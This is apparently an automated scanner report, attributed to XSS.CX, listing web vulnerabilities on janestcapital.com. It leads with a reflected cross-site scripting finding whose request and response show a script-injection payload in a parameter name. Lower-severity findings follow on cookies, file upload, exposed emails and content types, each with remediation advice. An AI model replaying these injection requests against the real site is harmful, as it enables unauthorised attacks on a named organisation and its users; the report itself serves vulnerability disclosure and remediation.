Date: Sat, 25 Dec 2010 21:34:55 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 6780
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<m
...[SNIP]...
<a href="/ja/workplace/internships.php/x2276e95"><script>alert(1)</script>8d263852bd9">
...[SNIP]...

1.50. http://www.janestcapital.com/workplace/internships.php/x22 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.janestcapital.com
Path:	/workplace/internships.php/x22

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54e9d"><script>alert(1)</script>ef5823828d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /workplace/internships.php/x22?54e9d"><script>alert(1)</script>ef5823828d=1 HTTP/1.1
Host: www.janestcapital.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252582802.1293334270.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=qp30qlsmc7sdnvhrpe287pt0a4; __utma=252582802.879184777.1293334270.1293334270.1293334270.1; __utmc=252582802; __utmb=252582802.9.10.1293334270;

Response

HTTP/1.1 200 OK
Date: Sat, 25 Dec 2010 21:34:44 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 6782
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<m
...[SNIP]...
<a href="/ja/workplace/internships.php/x22?54e9d"><script>alert(1)</script>ef5823828d=1">
...[SNIP]...

2. Cookie without HttpOnly flag set previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.janestcapital.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=qp30qlsmc7sdnvhrpe287pt0a4; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

Request

GET / HTTP/1.1
Host: www.janestcapital.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/
X-Purpose: prefetch
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 25 Dec 2010 21:31:34 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=qp30qlsmc7sdnvhrpe287pt0a4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 6640
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<m
...[SNIP]...

3. File upload functionality previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.janestcapital.com
Path:	/apply/

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:

http://www.janestcapital.com/apply/send_application.php

Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Issue background

File upload functionality is commonly associated with a number of vulnerabilities, including:

File path traversal
Persistent cross-site scripting
Placing of other client-executable code into the domain
Transmission of viruses and other malware
Denial of service

You should review the file upload functionality to understand its purpose, and establish whether uploaded content is ever returned to other application users, either through their normal usage of the application or by being fed a specific link by an attacker.

Some factors to consider when evaluating the security impact of this functionality include:

Whether uploaded content can subsequently be downloaded via a URL within the application.
What Content-type and Content-disposition headers the application returns when the file's content is downloaded.
Whether it is possible to place executable HTML/JavaScript into the file, which executes when the file's contents are viewed.
Whether the application performs any filtering on the file extension or MIME type of the uploaded file.
Whether it is possible to construct a hybrid file containing both executable and non-executable content, to bypass any content filters - for example, a file containing both a GIF image and a Java archive (known as a GIFAR file).
What location is used to store uploaded content, and whether it is possible to supply a crafted filename to escape from this location.
Whether archive formats such as ZIP are unpacked by the application.
How the application handles attempts to upload very large files, or decompression bomb files.

Issue remediation

File upload functionality is not straightforward to implement securely. Some recommendations to consider in the design of this functionality include:

Use a server-generated filename if storing uploaded files on disk.
Inspect the content of uploaded files, and enforce a whitelist of accepted, non-executable content types. Additionally, enforce a blacklist of common executable formats, to hinder hybrid file attacks.
Enforce a whitelist of accepted, non-executable file extensions.
If uploaded files are downloaded by users, supply an accurate non-generic Content-type header, and also a Content-disposition header which specifies that browsers should handle the file as an attachment.
Enforce a size limit on uploaded files (for defense-in-depth, this can be implemented both within application code and in the web server's configuration.
Reject attempts to upload archive formats such as ZIP.

Request

GET /apply/ HTTP/1.1
Host: www.janestcapital.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=qp30qlsmc7sdnvhrpe287pt0a4; __utmz=252582802.1293334270.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252582802.879184777.1293334270.1293334270.1293334270.1; __utmc=252582802; __utmb=252582802.1.10.1293334270

Response

HTTP/1.1 200 OK
Date: Sat, 25 Dec 2010 21:32:30 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 12839

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<m
...[SNIP]...
</p>
<input type="file" name="resume">
<br/>
...[SNIP]...

4. Email addresses disclosed previous next
There are 8 instances of this issue:

/apply/
/ja/apply/
/ja/apply/calendar.php
/ja/education/
/ja/workplace/
/ja/workplace/benefits.php
/ja/workplace/faq.php
/ja/workplace/internships.php

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

4.1. http://www.janestcapital.com/apply/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.janestcapital.com
Path:	/apply/

Issue detail

The following email address was disclosed in the response:

webmaster@janestreet.com

Request

Response

HTTP/1.1 200 OK
Date: Sat, 25 Dec 2010 21:32:30 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 12839

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<m
...[SNIP]...
<a href="mailto:webmaster@janestreet.com">webmaster@janestreet.com</a>
...[SNIP]...

4.2. http://www.janestcapital.com/ja/apply/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.janestcapital.com
Path:	/ja/apply/

Issue detail

The following email address was disclosed in the response:

recruitjpn@janestreet.com

Request

GET /ja/apply/ HTTP/1.1
Host: www.janestcapital.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252582802.1293334270.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=qp30qlsmc7sdnvhrpe287pt0a4; __utma=252582802.879184777.1293334270.1293334270.1293334270.1; __utmc=252582802; __utmb=252582802.9.10.1293334270;

Response

HTTP/1.1 200 OK
Date: Sat, 25 Dec 2010 21:33:45 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 6445
Connection: close
Content-Type: text/html; charset=UTF-8

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">

...[SNIP]...
<a href="mailto:recruitjpn@janestreet.com">recruitjpn@janestreet.com</a>
...[SNIP]...
<a href="mailto:recruitjpn@janestreet.com">recruitjpn@janestreet.com</a>
...[SNIP]...

4.3. http://www.janestcapital.com/ja/apply/calendar.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.janestcapital.com
Path:	/ja/apply/calendar.php

Issue detail

The following email address was disclosed in the response:

recruitjpn@janestreet.com

Request

GET /ja/apply/calendar.php HTTP/1.1
Host: www.janestcapital.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252582802.1293334270.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=qp30qlsmc7sdnvhrpe287pt0a4; __utma=252582802.879184777.1293334270.1293334270.1293334270.1; __utmc=252582802; __utmb=252582802.9.10.1293334270;

Response

HTTP/1.1 200 OK
Date: Sat, 25 Dec 2010 21:33:45 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 6757
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<m
...[SNIP]...
<a href="mailto:recruitjpn@janestreet.com">recruitjpn@janestreet.com</a>
...[SNIP]...

4.4. http://www.janestcapital.com/ja/education/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.janestcapital.com
Path:	/ja/education/

Issue detail

The following email address was disclosed in the response:

recruitjpn@janestreet.com

Request

GET /ja/education/ HTTP/1.1
Host: www.janestcapital.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252582802.1293334270.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=qp30qlsmc7sdnvhrpe287pt0a4; __utma=252582802.879184777.1293334270.1293334270.1293334270.1; __utmc=252582802; __utmb=252582802.9.10.1293334270;

Response

HTTP/1.1 200 OK
Date: Sat, 25 Dec 2010 21:33:47 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 7609
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<m
...[SNIP]...
<a href="mailto:recruitjpn@janestreet.com">recruitjpn@janestreet.com</a>
...[SNIP]...

4.5. http://www.janestcapital.com/ja/workplace/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.janestcapital.com
Path:	/ja/workplace/

Issue detail

The following email address was disclosed in the response:

recruitjpn@janestreet.com

Request

GET /ja/workplace/ HTTP/1.1
Host: www.janestcapital.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252582802.1293334270.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=qp30qlsmc7sdnvhrpe287pt0a4; __utma=252582802.879184777.1293334270.1293334270.1293334270.1; __utmc=252582802; __utmb=252582802.9.10.1293334270;

Response

HTTP/1.1 200 OK
Date: Sat, 25 Dec 2010 21:33:46 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 7252
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<m
...[SNIP]...
<a href="mailto:recruitjpn@janestreet.com">recruitjpn@janestreet.com</a>
...[SNIP]...

4.6. http://www.janestcapital.com/ja/workplace/benefits.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.janestcapital.com
Path:	/ja/workplace/benefits.php

Issue detail

The following email address was disclosed in the response:

recruitjpn@janestreet.com

Request

GET /ja/workplace/benefits.php HTTP/1.1
Host: www.janestcapital.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252582802.1293334270.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=qp30qlsmc7sdnvhrpe287pt0a4; __utma=252582802.879184777.1293334270.1293334270.1293334270.1; __utmc=252582802; __utmb=252582802.9.10.1293334270;

Response

HTTP/1.1 200 OK
Date: Sat, 25 Dec 2010 21:33:47 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 7344
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<m
...[SNIP]...
<a href="mailto:recruitjpn@janestreet.com">recruitjpn@janestreet.com</a>
...[SNIP]...

4.7. http://www.janestcapital.com/ja/workplace/faq.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.janestcapital.com
Path:	/ja/workplace/faq.php

Issue detail

The following email address was disclosed in the response:

recruitjpn@janestreet.com

Request

GET /ja/workplace/faq.php HTTP/1.1
Host: www.janestcapital.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252582802.1293334270.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=qp30qlsmc7sdnvhrpe287pt0a4; __utma=252582802.879184777.1293334270.1293334270.1293334270.1; __utmc=252582802; __utmb=252582802.9.10.1293334270;

Response

HTTP/1.1 200 OK
Date: Sat, 25 Dec 2010 21:33:45 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 12037

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<m
...[SNIP]...
<a href="mailto:recruitjpn@janestreet.com">recruitjpn@janestreet.com</a>
...[SNIP]...

4.8. http://www.janestcapital.com/ja/workplace/internships.php previous

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.janestcapital.com
Path:	/ja/workplace/internships.php

Issue detail

The following email address was disclosed in the response:

recruitjpn@janestreet.com

Request

GET /ja/workplace/internships.php HTTP/1.1
Host: www.janestcapital.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252582802.1293334270.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=qp30qlsmc7sdnvhrpe287pt0a4; __utma=252582802.879184777.1293334270.1293334270.1293334270.1; __utmc=252582802; __utmb=252582802.9.10.1293334270;

Response

HTTP/1.1 200 OK
Date: Sat, 25 Dec 2010 21:33:47 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8037

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<m
...[SNIP]...
<a href="mailto:recruitjpn@janestreet.com">recruitjpn@janestreet.com</a>
...[SNIP]...

5. Content type incorrectly stated previous

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.janestcapital.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

Request

GET /favicon.ico HTTP/1.1
Host: www.janestcapital.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=qp30qlsmc7sdnvhrpe287pt0a4; __utmz=252582802.1293334270.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252582802.879184777.1293334270.1293334270.1293334270.1; __utmc=252582802; __utmb=252582802.1.10.1293334270

Response

HTTP/1.1 200 OK
Date: Sat, 25 Dec 2010 21:31:44 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 13 Dec 2010 19:46:26 GMT
ETag: "6b44bc-e36-4974ff5a0a880"
Accept-Ranges: bytes
Content-Length: 3638
Connection: close
Content-Type: text/plain; charset=UTF-8

..............h...&... ..............(....... ...........@...........................h...........................{...............................q.....................................................
...[SNIP]...

Report generated by XSS.CX at Mon Dec 27 10:24:47 CST 2010.

janestcapital.com, XSS, Cross Site Scripting, CWE-79, CAPEC-86

Cross Site Scripting in janestcapital.com | Vulnerability Crawler Report

Contents

Contents

Issue background

Issue remediation

Summary

Issue detail

Request

Response

Summary

Issue detail

Request

Response (redirected)

Summary

Issue detail

Request

Response

Summary

Issue detail

Request

Response

Summary

Issue detail

Request

Response

Summary

Issue detail

Request

Response

Summary

Issue detail

Request

Response

Summary

Issue detail

Request

Response

Summary

Issue detail

Request

Response

Summary

Issue detail

Request

Response

Summary

Issue detail

Request

Response

Summary

Issue detail

Request

Response

Summary

Issue detail

Request

Response

Summary

Issue detail

Request

Response

Summary

Issue detail

Request

Response

Summary

Issue detail

Request

Response

Summary

Issue detail

Request

Response

Summary

Issue detail

Request

Response

Summary

Issue detail